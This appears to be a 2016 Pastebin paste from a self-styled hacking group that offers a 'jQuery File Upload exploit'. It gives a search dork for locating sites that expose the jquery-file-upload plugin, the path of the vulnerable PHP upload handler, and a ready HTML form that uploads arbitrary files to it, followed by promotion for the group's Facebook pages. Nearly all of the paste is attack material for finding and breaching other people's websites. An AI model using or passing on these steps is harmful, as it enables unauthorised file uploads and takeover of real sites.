Advertisement
zeeshan-haxor-zesn

Jquery File Upload Exploit

Jul 14th, 2016
612
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. Old but Gold exploit
  2. By Zeeshan Haxor:
  3. #CyberTeamRox
  4. jquery file upload vulnerability:
  5. Dork : /assets/global/plugins/jquery-file-upload/
  6.  
  7. Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
  8.  
  9. Script CSRF :
  10. <form method="POST" action="http://localhost/assets/global/plugins/jquery-file-upload/server/php/"
  11. enctype="multipart/form-data">
  12. <input type="file" name="files[]" /><button>Upload</button>
  13. </form>
  14.  
  15. #Official Page
  16. https://www.facebook.com/Cyberteamrox3/
  17. #Official Group
  18. https://www.facebook.com/groups/CyberTeamRoxOfficial/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement